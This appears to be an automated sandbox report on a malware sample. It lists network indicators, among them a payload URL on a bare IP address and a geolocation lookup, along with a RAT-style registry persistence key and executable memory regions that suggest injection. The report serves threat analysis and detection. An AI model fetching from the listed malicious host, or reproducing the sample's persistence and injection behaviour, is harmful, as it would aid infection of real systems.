http://103.237.86.247/Daguerreotypiernes.f
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
http://103.237.86.247/Daguerreotypiernes.fl
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://waw02prdapp02-canary.netmon.azure.com/apc/trans.gif?469316a07faf13c962eeef1395652e59
|
unknown
|
||
|
http://www.imvu.com
|
unknown
|
||
|
https://aefd.nelreports.net/api/report?cat=wsb
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
http://103.237.86.247/Daguerreotypiernes.flaXR
|
unknown
|
||
|
http://103.237.86.247/Daguerreotypiernes.fla
|
103.237.86.247
|
||
|
http://103.237.86.247/Daguerreotypiernes.flaSunvider
|
unknown
|
||
|
http://103.237.86.2
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
http://103.237.86.247/Dagu
|
unknown
|
||
|
http://103.237.86.247/
|
unknown
|
||
|
http://geoplugin.net/json.gp
|
178.237.33.50
|
||
|
http://103.237.86.24
|
unknown
|
||
|
https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=MIRA-WW-PH7&FrontEn
|
unknown
|
||
|
http://crl.micro
|
unknown
|
||
|
https://aefd.nelreports.net/api/report?cat=bingaot
|
unknown
|
||
|
http://103.237.86.247/Dag
|
unknown
|
||
|
http://103.237.86.247/Daguer
|
unknown
|
||
|
https://07ab41ecf42bc570255fdecc8dea3fa9.azr.footprintdns.com/apc/trans.gif?f0f7e1407b69bd65640be717
|
unknown
|
||
|
http://103.237.86.247/Dague
|
unknown
|
||
|
http://103.237.86.247/Daguerreotypierne
|
unknown
|
||
|
http://geoplugin.net/json.gpHz
|
unknown
|
||
|
https://waw02prdapp02-canary.netmon.azure.com/apc/trans.gif?407dab52f7bc43350b5cde12afe93269
|
unknown
|
||
|
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svg
|
unknown
|
||
|
http://103.237.86.247/Daguerreotypiernes
|
unknown
|
||
|
https://07ab41ecf42bc570255fdecc8dea3fa9.azr.footprintdns.com/apc/trans.gif?5b3bec92835bc024c52f96dd
|
unknown
|
||
|
https://aefd.nelreports.net/api/report?cat=bingrms
|
unknown
|
||
|
https://www.google.com/accounts/servicelogin
|
unknown
|
||
|
https://7da35b81493d6264eefb208fce0c5757.azr.footprintdns.com/apc/trans.gif?f92d19bcbba8eb1999dabbc8
|
unknown
|
||
|
http://103.237.86.247/Daguerreoty
|
unknown
|
||
|
http://103.237.86.247/Daguerreotypier
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
http://103.237.86.247/Daguerreotypie
|
unknown
|
||
|
http://103.23
|
unknown
|
||
|
http://www.ebuddy.com
|
unknown
|
||
|
https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-LAX31r5a&
|
unknown
|
There are 73 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
bg.microsoft.map.fastly.net
|
199.232.210.172
|
||
|
geoplugin.net
|
178.237.33.50
|
||
|
198.187.3.20.in-addr.arpa
|
unknown
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
103.237.87.161
|
unknown
|
unknown
|
|
|
|
178.237.33.50
|
geoplugin.net
|
Netherlands
|
||
|
103.237.86.247
|
unknown
|
unknown
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Rmc-KECL2I
|
exepath
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Rmc-KECL2I
|
licence
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Rmc-KECL2I
|
time
|
There are 7 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
8DF000
|
heap
|
page read and write
|
|
|
|
3BF000
|
stack
|
page read and write
|
|
|
|
8C2000
|
heap
|
page read and write
|
|
|
|
8F9F000
|
direct allocation
|
page execute and read and write
|
|
|
|
8770000
|
direct allocation
|
page execute and read and write
|
|
|
|
5C63000
|
trusted library allocation
|
page read and write
|
|
|
|
258F5F75000
|
trusted library allocation
|
page read and write
|
|
|
|
4BBC000
|
heap
|
page read and write
|
||
|
F32FC0D000
|
stack
|
page read and write
|
||
|
875000
|
heap
|
page read and write
|
||
|
291C3EBC000
|
heap
|
page read and write
|
||
|
87A0000
|
direct allocation
|
page read and write
|
||
|
31EF000
|
stack
|
page read and write
|
||
|
291C3FFE000
|
heap
|
page read and write
|
||
|
903000
|
heap
|
page read and write
|
||
|
4BB4000
|
heap
|
page read and write
|
||
|
4BA1000
|
heap
|
page read and write
|
||
|
291C3FBA000
|
heap
|
page read and write
|
||
|
342E000
|
stack
|
page read and write
|
||
|
F32EA7E000
|
stack
|
page read and write
|
||
|
4BC2000
|
heap
|
page read and write
|
||
|
4BA1000
|
heap
|
page read and write
|
||
|
74BD000
|
trusted library allocation
|
page read and write
|
||
|
3810000
|
heap
|
page read and write
|
||
|
875000
|
heap
|
page read and write
|
||
|
2121B000
|
heap
|
page read and write
|
||
|
2C8A000
|
heap
|
page read and write
|
||
|
21113000
|
heap
|
page read and write
|
||
|
908000
|
heap
|
page read and write
|
||
|
48A5000
|
heap
|
page execute and read and write
|
||
|
4BB1000
|
heap
|
page read and write
|
||
|
874000
|
heap
|
page read and write
|
||
|
4BAF000
|
heap
|
page read and write
|
||
|
33E4000
|
heap
|
page read and write
|
||
|
2121E000
|
heap
|
page read and write
|
||
|
908000
|
heap
|
page read and write
|
||
|
844B000
|
heap
|
page read and write
|
||
|
45D000
|
system
|
page execute and read and write
|
||
|
4590000
|
heap
|
page read and write
|
||
|
A4F000
|
stack
|
page read and write
|
||
|
9C0000
|
direct allocation
|
page read and write
|
||
|
291C3E8D000
|
heap
|
page read and write
|
||
|
45C000
|
system
|
page execute and read and write
|
||
|
F32FB8E000
|
stack
|
page read and write
|
||
|
36D8000
|
heap
|
page read and write
|
||
|
20A6E000
|
stack
|
page read and write
|
||
|
850000
|
heap
|
page read and write
|
||
|
45B1000
|
heap
|
page read and write
|
||
|
20BFF000
|
stack
|
page read and write
|
||
|
20F08000
|
heap
|
page read and write
|
||
|
920000
|
heap
|
page read and write
|
||
|
6F3C000
|
stack
|
page read and write
|
||
|
45B0000
|
heap
|
page read and write
|
||
|
2D40000
|
trusted library allocation
|
page read and write
|
||
|
F32ECFE000
|
stack
|
page read and write
|
||
|
8FB000
|
heap
|
page read and write
|
||
|
8441000
|
heap
|
page read and write
|
||
|
4BA8000
|
heap
|
page read and write
|
||
|
4CFB1FE000
|
unkown
|
page read and write
|
||
|
4BD1000
|
heap
|
page read and write
|
||
|
4BB0000
|
heap
|
page read and write
|
||
|
4BBF000
|
heap
|
page read and write
|
||
|
291C3FBA000
|
heap
|
page read and write
|
||
|
4BBF000
|
heap
|
page read and write
|
||
|
258F5F21000
|
trusted library allocation
|
page read and write
|
||
|
258FE392000
|
heap
|
page read and write
|
||
|
2EE9000
|
heap
|
page read and write
|
||
|
5301000
|
heap
|
page read and write
|
||
|
7FFB4B002000
|
trusted library allocation
|
page read and write
|
||
|
4BBF000
|
heap
|
page read and write
|
||
|
45C6000
|
heap
|
page read and write
|
||
|
2BDE000
|
stack
|
page read and write
|
||
|
45B1000
|
heap
|
page read and write
|
||
|
258FE329000
|
heap
|
page read and write
|
||
|
33E4000
|
heap
|
page read and write
|
||
|
4BC9000
|
heap
|
page read and write
|
||
|
7FFB4B230000
|
trusted library allocation
|
page read and write
|
||
|
874000
|
heap
|
page read and write
|
||
|
258E6719000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B320000
|
trusted library allocation
|
page read and write
|
||
|
4BA5000
|
heap
|
page read and write
|
||
|
7620000
|
trusted library allocation
|
page read and write
|
||
|
291C3EA1000
|
heap
|
page read and write
|
||
|
20CFF000
|
stack
|
page read and write
|
||
|
8E70000
|
direct allocation
|
page execute and read and write
|
||
|
208DE000
|
stack
|
page read and write
|
||
|
868C000
|
stack
|
page read and write
|
||
|
4BB4000
|
heap
|
page read and write
|
||
|
4A4F000
|
remote allocation
|
page execute and read and write
|
||
|
875E000
|
stack
|
page read and write
|
||
|
7670000
|
trusted library allocation
|
page read and write
|
||
|
726E000
|
heap
|
page read and write
|
||
|
4BC4000
|
heap
|
page read and write
|
||
|
4BBC000
|
heap
|
page read and write
|
||
|
4BE5000
|
heap
|
page read and write
|
||
|
7FFB4B330000
|
trusted library allocation
|
page read and write
|
||
|
4BC1000
|
heap
|
page read and write
|
||
|
4BAF000
|
heap
|
page read and write
|
||
|
4BBF000
|
heap
|
page read and write
|
||
|
7690000
|
trusted library allocation
|
page read and write
|
||
|
74A0000
|
trusted library allocation
|
page read and write
|
||
|
473000
|
system
|
page execute and read and write
|
||
|
258E4490000
|
heap
|
page read and write
|
||
|
7FA70000
|
trusted library allocation
|
page execute and read and write
|
||
|
834C000
|
stack
|
page read and write
|
||
|
291C2232000
|
heap
|
page read and write
|
||
|
4BBF000
|
heap
|
page read and write
|
||
|
291C217A000
|
heap
|
page read and write
|
||
|
4BAB000
|
heap
|
page read and write
|
||
|
258FE470000
|
heap
|
page read and write
|
||
|
2DF0000
|
trusted library allocation
|
page execute and read and write
|
||
|
258FE533000
|
heap
|
page read and write
|
||
|
7FFB4B2D0000
|
trusted library allocation
|
page read and write
|
||
|
291C3EA2000
|
heap
|
page read and write
|
||
|
48EE000
|
stack
|
page read and write
|
||
|
291C2179000
|
heap
|
page read and write
|
||
|
4BAC000
|
heap
|
page read and write
|
||
|
20F94000
|
heap
|
page read and write
|
||
|
2D6A000
|
trusted library allocation
|
page execute and read and write
|
||
|
258E4460000
|
heap
|
page execute and read and write
|
||
|
291C3EA2000
|
heap
|
page read and write
|
||
|
4BAB000
|
heap
|
page read and write
|
||
|
485E000
|
stack
|
page read and write
|
||
|
4EDA000
|
heap
|
page read and write
|
||
|
209DE000
|
stack
|
page read and write
|
||
|
2D20000
|
trusted library section
|
page read and write
|
||
|
291C21E9000
|
heap
|
page read and write
|
||
|
7FFB4B01B000
|
trusted library allocation
|
page read and write
|
||
|
875000
|
heap
|
page read and write
|
||
|
7470000
|
trusted library allocation
|
page read and write
|
||
|
7460000
|
trusted library allocation
|
page read and write
|
||
|
258E675E000
|
trusted library allocation
|
page read and write
|
||
|
4689000
|
heap
|
page read and write
|
||
|
4BAA000
|
heap
|
page read and write
|
||
|
4BBF000
|
heap
|
page read and write
|
||
|
815D000
|
stack
|
page read and write
|
||
|
291C21DD000
|
heap
|
page read and write
|
||
|
4BA1000
|
heap
|
page read and write
|
||
|
2D4D000
|
trusted library allocation
|
page execute and read and write
|
||
|
258F5F01000
|
trusted library allocation
|
page read and write
|
||
|
87F0000
|
direct allocation
|
page read and write
|
||
|
2DE0000
|
heap
|
page readonly
|
||
|
48A0000
|
heap
|
page execute and read and write
|
||
|
291C3F80000
|
heap
|
page read and write
|
||
|
F32ED3E000
|
stack
|
page read and write
|
||
|
291C21FD000
|
heap
|
page read and write
|
||
|
456000
|
system
|
page execute and read and write
|
||
|
2F01000
|
heap
|
page read and write
|
||
|
4DA0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B210000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B004000
|
trusted library allocation
|
page read and write
|
||
|
258E42A7000
|
heap
|
page read and write
|
||
|
840E000
|
stack
|
page read and write
|
||
|
2DE7000
|
heap
|
page read and write
|
||
|
4BA9000
|
heap
|
page read and write
|
||
|
2091E000
|
stack
|
page read and write
|
||
|
400000
|
system
|
page execute and read and write
|
||
|
F32FC8A000
|
stack
|
page read and write
|
||
|
8790000
|
direct allocation
|
page read and write
|
||
|
7030000
|
heap
|
page read and write
|
||
|
2E40000
|
heap
|
page read and write
|
||
|
258E4467000
|
heap
|
page execute and read and write
|
||
|
87E0000
|
trusted library allocation
|
page execute and read and write
|
||
|
4BC8000
|
heap
|
page read and write
|
||
|
291C21DD000
|
heap
|
page read and write
|
||
|
291C2161000
|
heap
|
page read and write
|
||
|
929D2FB000
|
stack
|
page read and write
|
||
|
2DE9000
|
heap
|
page read and write
|
||
|
4BDC000
|
heap
|
page read and write
|
||
|
291C2180000
|
heap
|
page read and write
|
||
|
4BC4000
|
heap
|
page read and write
|
||
|
471F000
|
stack
|
page read and write
|
||
|
4BBF000
|
heap
|
page read and write
|
||
|
4AA1000
|
heap
|
page read and write
|
||
|
8F3000
|
heap
|
page read and write
|
||
|
81A0000
|
heap
|
page read and write
|
||
|
7FFB4B003000
|
trusted library allocation
|
page execute and read and write
|
||
|
258FE548000
|
heap
|
page read and write
|
||
|
45C1000
|
heap
|
page read and write
|
||
|
4BC8000
|
heap
|
page read and write
|
||
|
258E42A9000
|
heap
|
page read and write
|
||
|
291C3FED000
|
heap
|
page read and write
|
||
|
7FFB4B1F0000
|
trusted library allocation
|
page execute and read and write
|
||
|
2DBF000
|
stack
|
page read and write
|
||
|
2F7F000
|
stack
|
page read and write
|
||
|
9B0000
|
direct allocation
|
page read and write
|
||
|
4CFB0FD000
|
stack
|
page read and write
|
||
|
903000
|
heap
|
page read and write
|
||
|
7FFB4B240000
|
trusted library allocation
|
page read and write
|
||
|
291C3E87000
|
heap
|
page read and write
|
||
|
F32EB7E000
|
stack
|
page read and write
|
||
|
2DEB000
|
heap
|
page read and write
|
||
|
90B000
|
heap
|
page read and write
|
||
|
2099B000
|
stack
|
page read and write
|
||
|
990000
|
direct allocation
|
page read and write
|
||
|
8850000
|
direct allocation
|
page read and write
|
||
|
258E77D5000
|
trusted library allocation
|
page read and write
|
||
|
291C403C000
|
heap
|
page read and write
|
||
|
2089F000
|
stack
|
page read and write
|
||
|
8820000
|
direct allocation
|
page read and write
|
||
|
874000
|
heap
|
page read and write
|
||
|
291C3F81000
|
heap
|
page read and write
|
||
|
4BBC000
|
heap
|
page read and write
|
||
|
F32EC7E000
|
stack
|
page read and write
|
||
|
4BA9000
|
heap
|
page read and write
|
||
|
76C0000
|
trusted library allocation
|
page read and write
|
||
|
20DB0000
|
unclassified section
|
page execute and read and write
|
||
|
86A0000
|
trusted library allocation
|
page read and write
|
||
|
4BE5000
|
heap
|
page read and write
|
||
|
751E000
|
stack
|
page read and write
|
||
|
21099000
|
heap
|
page read and write
|
||
|
4BBC000
|
heap
|
page read and write
|
||
|
258E71A8000
|
trusted library allocation
|
page read and write
|
||
|
20CBD000
|
stack
|
page read and write
|
||
|
4DA0000
|
trusted library allocation
|
page read and write
|
||
|
291C3EA2000
|
heap
|
page read and write
|
||
|
2D60000
|
trusted library allocation
|
page read and write
|
||
|
20AAE000
|
stack
|
page read and write
|
||
|
4BBF000
|
heap
|
page read and write
|
||
|
291C4123000
|
heap
|
page read and write
|
||
|
4BC1000
|
heap
|
page read and write
|
||
|
903000
|
heap
|
page read and write
|
||
|
4BC4000
|
heap
|
page read and write
|
||
|
258E7D1E000
|
trusted library allocation
|
page read and write
|
||
|
929D0FF000
|
stack
|
page read and write
|
||
|
4BAF000
|
heap
|
page read and write
|
||
|
4BAE000
|
heap
|
page read and write
|
||
|
51EB000
|
trusted library allocation
|
page read and write
|
||
|
4BAB000
|
heap
|
page read and write
|
||
|
258E5D70000
|
heap
|
page read and write
|
||
|
875000
|
heap
|
page read and write
|
||
|
258E7D24000
|
trusted library allocation
|
page read and write
|
||
|
875000
|
heap
|
page read and write
|
||
|
908000
|
heap
|
page read and write
|
||
|
291C3EA1000
|
heap
|
page read and write
|
||
|
291C3FBA000
|
heap
|
page read and write
|
||
|
850000
|
direct allocation
|
page read and write
|
||
|
258E7803000
|
trusted library allocation
|
page read and write
|
||
|
2121E000
|
heap
|
page read and write
|
||
|
5203000
|
trusted library allocation
|
page read and write
|
||
|
4BB4000
|
heap
|
page read and write
|
||
|
258E42C7000
|
heap
|
page read and write
|
||
|
2D70000
|
heap
|
page read and write
|
||
|
291C3EBC000
|
heap
|
page read and write
|
||
|
258E77D7000
|
trusted library allocation
|
page read and write
|
||
|
4BAB000
|
heap
|
page read and write
|
||
|
86C0000
|
trusted library allocation
|
page read and write
|
||
|
33E4000
|
heap
|
page read and write
|
||
|
291C40A5000
|
heap
|
page read and write
|
||
|
35AE000
|
stack
|
page read and write
|
||
|
2D44000
|
trusted library allocation
|
page read and write
|
||
|
F32E9FE000
|
stack
|
page read and write
|
||
|
20F08000
|
heap
|
page read and write
|
||
|
53AE000
|
trusted library allocation
|
page read and write
|
||
|
76A0000
|
trusted library allocation
|
page read and write
|
||
|
4BBF000
|
heap
|
page read and write
|
||
|
911000
|
heap
|
page read and write
|
||
|
7FFB4B0C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
4BE4000
|
heap
|
page read and write
|
||
|
45B1000
|
heap
|
page read and write
|
||
|
4BAF000
|
heap
|
page read and write
|
||
|
323C000
|
stack
|
page read and write
|
||
|
3123000
|
heap
|
page read and write
|
||
|
900000
|
heap
|
page read and write
|
||
|
291C401C000
|
heap
|
page read and write
|
||
|
772B000
|
stack
|
page read and write
|
||
|
2DEA000
|
heap
|
page read and write
|
||
|
291C3E81000
|
heap
|
page read and write
|
||
|
21113000
|
heap
|
page read and write
|
||
|
21293000
|
unclassified section
|
page execute and read and write
|
||
|
8840000
|
direct allocation
|
page read and write
|
||
|
35D0000
|
heap
|
page read and write
|
||
|
845B000
|
heap
|
page read and write
|
||
|
929D1FE000
|
stack
|
page read and write
|
||
|
2DDE000
|
stack
|
page read and write
|
||
|
4A0D000
|
trusted library allocation
|
page read and write
|
||
|
291C415B000
|
heap
|
page read and write
|
||
|
291C2340000
|
remote allocation
|
page read and write
|
||
|
4BBC000
|
heap
|
page read and write
|
||
|
4BEA000
|
heap
|
page read and write
|
||
|
4BEF000
|
heap
|
page read and write
|
||
|
291C3FFE000
|
heap
|
page read and write
|
||
|
258FE2F9000
|
heap
|
page read and write
|
||
|
4BA8000
|
heap
|
page read and write
|
||
|
3F20000
|
remote allocation
|
page execute and read and write
|
||
|
7AC000
|
stack
|
page read and write
|
||
|
6FBB000
|
stack
|
page read and write
|
||
|
45B1000
|
heap
|
page read and write
|
||
|
874000
|
heap
|
page read and write
|
||
|
8760000
|
trusted library allocation
|
page read and write
|
||
|
4BC3000
|
heap
|
page read and write
|
||
|
291C2140000
|
heap
|
page read and write
|
||
|
7640000
|
trusted library allocation
|
page read and write
|
||
|
5380000
|
trusted library allocation
|
page read and write
|
||
|
33E4000
|
heap
|
page read and write
|
||
|
7FFB4B220000
|
trusted library allocation
|
page read and write
|
||
|
291C3FCD000
|
heap
|
page read and write
|
||
|
A50000
|
heap
|
page read and write
|
||
|
5A1A000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4B00D000
|
trusted library allocation
|
page execute and read and write
|
||
|
5C5E000
|
trusted library allocation
|
page read and write
|
||
|
4BBC000
|
heap
|
page read and write
|
||
|
45CB000
|
heap
|
page read and write
|
||
|
2ECF000
|
unkown
|
page read and write
|
||
|
291C2050000
|
heap
|
page read and write
|
||
|
291C40FE000
|
heap
|
page read and write
|
||
|
4AA1000
|
heap
|
page read and write
|
||
|
908000
|
heap
|
page read and write
|
||
|
291C3F98000
|
heap
|
page read and write
|
||
|
258E4260000
|
heap
|
page read and write
|
||
|
2C80000
|
heap
|
page read and write
|
||
|
258E4495000
|
heap
|
page read and write
|
||
|
4BDD000
|
heap
|
page read and write
|
||
|
929CBFF000
|
stack
|
page read and write
|
||
|
291C3FCD000
|
heap
|
page read and write
|
||
|
291C3FFE000
|
heap
|
page read and write
|
||
|
291C2150000
|
heap
|
page read and write
|
||
|
54C000
|
stack
|
page read and write
|
||
|
2D0E000
|
stack
|
page read and write
|
||
|
291C3E88000
|
heap
|
page read and write
|
||
|
870000
|
heap
|
page read and write
|
||
|
45C0000
|
heap
|
page read and write
|
||
|
F32EBFE000
|
stack
|
page read and write
|
||
|
258E4450000
|
trusted library allocation
|
page read and write
|
||
|
2D75000
|
trusted library allocation
|
page execute and read and write
|
||
|
75DD000
|
stack
|
page read and write
|
||
|
929CCFE000
|
stack
|
page read and write
|
||
|
929CDFD000
|
stack
|
page read and write
|
||
|
258FE2C8000
|
heap
|
page read and write
|
||
|
4BBC000
|
heap
|
page read and write
|
||
|
2E82000
|
heap
|
page read and write
|
||
|
4BBC000
|
heap
|
page read and write
|
||
|
20B3C000
|
stack
|
page read and write
|
||
|
258E7D37000
|
trusted library allocation
|
page read and write
|
||
|
4BAF000
|
heap
|
page read and write
|
||
|
235B3E70000
|
heap
|
page read and write
|
||
|
258FE50B000
|
heap
|
page read and write
|
||
|
20F82000
|
heap
|
page read and write
|
||
|
7FFB4B010000
|
trusted library allocation
|
page read and write
|
||
|
80C0000
|
heap
|
page read and write
|
||
|
291C3FA9000
|
heap
|
page read and write
|
||
|
291C3FED000
|
heap
|
page read and write
|
||
|
20B7D000
|
stack
|
page read and write
|
||
|
291C3E92000
|
heap
|
page read and write
|
||
|
F32E97E000
|
stack
|
page read and write
|
||
|
980000
|
direct allocation
|
page read and write
|
||
|
4BBF000
|
heap
|
page read and write
|
||
|
2DEA000
|
heap
|
page read and write
|
||
|
2DEA000
|
heap
|
page read and write
|
||
|
4BC8000
|
heap
|
page read and write
|
||
|
4BBB000
|
heap
|
page read and write
|
||
|
2D43000
|
trusted library allocation
|
page execute and read and write
|
||
|
381D000
|
heap
|
page read and write
|
||
|
84E000
|
stack
|
page read and write
|
||
|
4BDD000
|
heap
|
page read and write
|
||
|
2EE0000
|
heap
|
page read and write
|
||
|
86B0000
|
trusted library allocation
|
page read and write
|
||
|
258E677A000
|
trusted library allocation
|
page read and write
|
||
|
45B0000
|
heap
|
page read and write
|
||
|
6F7D000
|
stack
|
page read and write
|
||
|
874000
|
heap
|
page read and write
|
||
|
4BC3000
|
heap
|
page read and write
|
||
|
2D72000
|
trusted library allocation
|
page read and write
|
||
|
33E4000
|
heap
|
page read and write
|
||
|
4BA8000
|
heap
|
page read and write
|
||
|
4BBF000
|
heap
|
page read and write
|
||
|
4BE5000
|
heap
|
page read and write
|
||
|
258E6797000
|
trusted library allocation
|
page read and write
|
||
|
21220000
|
unclassified section
|
page execute and read and write
|
||
|
4BA1000
|
heap
|
page read and write
|
||
|
7FFB4B0B6000
|
trusted library allocation
|
page read and write
|
||
|
4BA9000
|
heap
|
page read and write
|
||
|
80F0000
|
trusted library allocation
|
page read and write
|
||
|
291C4060000
|
heap
|
page read and write
|
||
|
291C2211000
|
heap
|
page read and write
|
||
|
291C3FCD000
|
heap
|
page read and write
|
||
|
4BC4000
|
heap
|
page read and write
|
||
|
4BDD000
|
heap
|
page read and write
|
||
|
291C3E80000
|
heap
|
page read and write
|
||
|
49D2000
|
heap
|
page read and write
|
||
|
BAE000
|
stack
|
page read and write
|
||
|
4BA1000
|
heap
|
page read and write
|
||
|
4BAD000
|
heap
|
page read and write
|
||
|
4689000
|
heap
|
page read and write
|
||
|
7610000
|
trusted library allocation
|
page execute and read and write
|
||
|
20A1F000
|
stack
|
page read and write
|
||
|
A58000
|
heap
|
page read and write
|
||
|
4BAF000
|
heap
|
page read and write
|
||
|
291C3E81000
|
heap
|
page read and write
|
||
|
6A0000
|
heap
|
page read and write
|
||
|
875000
|
heap
|
page read and write
|
||
|
8800000
|
direct allocation
|
page read and write
|
||
|
838C000
|
stack
|
page read and write
|
||
|
258E42AB000
|
heap
|
page read and write
|
||
|
20E91000
|
heap
|
page read and write
|
||
|
F32EFBE000
|
stack
|
page read and write
|
||
|
2DEA000
|
heap
|
page read and write
|
||
|
2127D000
|
unclassified section
|
page execute and read and write
|
||
|
235B3E40000
|
heap
|
page read and write
|
||
|
2C60000
|
heap
|
page read and write
|
||
|
7FFB4B340000
|
trusted library allocation
|
page read and write
|
||
|
3120000
|
heap
|
page read and write
|
||
|
941000
|
heap
|
page read and write
|
||
|
352F000
|
stack
|
page read and write
|
||
|
49A0000
|
heap
|
page read and write
|
||
|
2D30000
|
trusted library allocation
|
page read and write
|
||
|
2E0C000
|
heap
|
page read and write
|
||
|
291C401D000
|
heap
|
page read and write
|
||
|
291C220B000
|
heap
|
page read and write
|
||
|
475C000
|
stack
|
page read and write
|
||
|
2D70000
|
trusted library allocation
|
page read and write
|
||
|
291C3FA8000
|
heap
|
page read and write
|
||
|
291C3FCD000
|
heap
|
page read and write
|
||
|
291C3FA8000
|
heap
|
page read and write
|
||
|
2D90000
|
trusted library allocation
|
page read and write
|
||
|
258E4428000
|
heap
|
page read and write
|
||
|
20DE0000
|
direct allocation
|
page read and write
|
||
|
8690000
|
trusted library allocation
|
page execute and read and write
|
||
|
258E5C70000
|
trusted library allocation
|
page read and write
|
||
|
860000
|
direct allocation
|
page read and write
|
||
|
4BBC000
|
heap
|
page read and write
|
||
|
F32E8FD000
|
stack
|
page read and write
|
||
|
7600000
|
trusted library allocation
|
page read and write
|
||
|
20F82000
|
heap
|
page read and write
|
||
|
81D0000
|
trusted library allocation
|
page read and write
|
||
|
874000
|
heap
|
page read and write
|
||
|
4BBB000
|
heap
|
page read and write
|
||
|
291C3E8A000
|
heap
|
page read and write
|
||
|
83CE000
|
stack
|
page read and write
|
||
|
47B0000
|
heap
|
page execute and read and write
|
||
|
4BD1000
|
heap
|
page read and write
|
||
|
4DA4000
|
heap
|
page read and write
|
||
|
7FFB4B1B1000
|
trusted library allocation
|
page read and write
|
||
|
20F0A000
|
heap
|
page read and write
|
||
|
327A000
|
stack
|
page read and write
|
||
|
F32FD0B000
|
stack
|
page read and write
|
||
|
258E42B7000
|
heap
|
page read and write
|
||
|
8265000
|
trusted library allocation
|
page read and write
|
||
|
258E6580000
|
trusted library allocation
|
page read and write
|
||
|
4BD7000
|
heap
|
page read and write
|
||
|
7240000
|
heap
|
page read and write
|
||
|
874000
|
heap
|
page read and write
|
||
|
906000
|
heap
|
page read and write
|
||
|
4BDD000
|
heap
|
page read and write
|
||
|
725E000
|
heap
|
page read and write
|
||
|
291C4024000
|
heap
|
page read and write
|
||
|
291C3FBA000
|
heap
|
page read and write
|
||
|
45B0000
|
heap
|
page read and write
|
||
|
7E8000
|
stack
|
page read and write
|
||
|
4FE3000
|
heap
|
page read and write
|
||
|
291C3E88000
|
heap
|
page read and write
|
||
|
4BF9000
|
heap
|
page read and write
|
||
|
80D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
291C3FBA000
|
heap
|
page read and write
|
||
|
90B000
|
heap
|
page read and write
|
||
|
90B000
|
heap
|
page read and write
|
||
|
4BA0000
|
heap
|
page read and write
|
||
|
291C402D000
|
heap
|
page read and write
|
||
|
908000
|
heap
|
page read and write
|
||
|
2CCE000
|
stack
|
page read and write
|
||
|
6DBB000
|
stack
|
page read and write
|
||
|
2D6D000
|
stack
|
page read and write
|
||
|
941000
|
heap
|
page read and write
|
||
|
400000
|
system
|
page execute and read and write
|
||
|
291C21F9000
|
heap
|
page read and write
|
||
|
258E5D80000
|
heap
|
page read and write
|
||
|
4BC1000
|
heap
|
page read and write
|
||
|
291C217F000
|
heap
|
page read and write
|
||
|
8410000
|
heap
|
page read and write
|
||
|
4BAF000
|
heap
|
page read and write
|
||
|
291C21FF000
|
heap
|
page read and write
|
||
|
37E000
|
stack
|
page read and write
|
||
|
291C1F70000
|
heap
|
page read and write
|
||
|
7D9000
|
stack
|
page read and write
|
||
|
291C21A8000
|
heap
|
page read and write
|
||
|
4BBC000
|
heap
|
page read and write
|
||
|
906000
|
heap
|
page read and write
|
||
|
7450000
|
trusted library allocation
|
page read and write
|
||
|
291C2340000
|
remote allocation
|
page read and write
|
||
|
8810000
|
direct allocation
|
page read and write
|
||
|
291C2395000
|
heap
|
page read and write
|
||
|
9E0000
|
direct allocation
|
page read and write
|
||
|
291C223F000
|
heap
|
page read and write
|
||
|
59C1000
|
trusted library allocation
|
page read and write
|
||
|
